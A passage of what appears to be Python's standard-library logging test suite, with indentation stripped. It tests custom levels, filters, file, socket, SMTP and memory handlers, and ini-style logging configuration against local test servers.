SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
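# Registering a name makes it appear in formatted output; a minimal
# sketch of what setUp() below does for each entry:
#   logging.addLevelName(TERSE, 'Terse')
#   assert logging.getLevelName(TERSE) == 'Terse'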
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self._quit = True
support.join_thread(self._thread, timeout)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
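# A minimal usage sketch for TestSMTPServer (names here are illustrative):
#
#     sockmap = {}
#     server = TestSMTPServer(('localhost', 0), on_message, 0.001, sockmap)
#     server.start()
#     # ... connect an SMTP client to ('localhost', server.port) ...
#     server.stop()
#
# where on_message(peer, mailfrom, rcpttos, data) is any callable;
# SMTPHandlerTest.test_basic exercises exactly this pattern.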
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
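# Note: ControlMixin must come first in the bases (as in the server
# classes below) so that its start()/stop()/serve_forever() cooperate
# with the socketserver implementations via super().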
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:param bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
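# (setUp created the handler with capacity 10 and flushLevel
# logging.WARNING, so a flush happens either when a WARNING-or-above
# record arrives or when ten records have been buffered.)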
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
support.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config8 checks for a resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A config file with a subtle error (a misspelt stream name); loading should fail.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A config file with a less subtle error (an undefined formatter name); loading should fail.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash on Windows
# to avoid a unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
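# SocketHandler frames each record as a 4-byte big-endian length
# followed by a pickled dict of the record's attributes, roughly:
#
#     payload = pickle.dumps(record_dict, 1)
#     sock.sendall(struct.pack('>L', len(payload)) + payload)
#
# handle_socket() below reverses that framing to recover each record.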
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
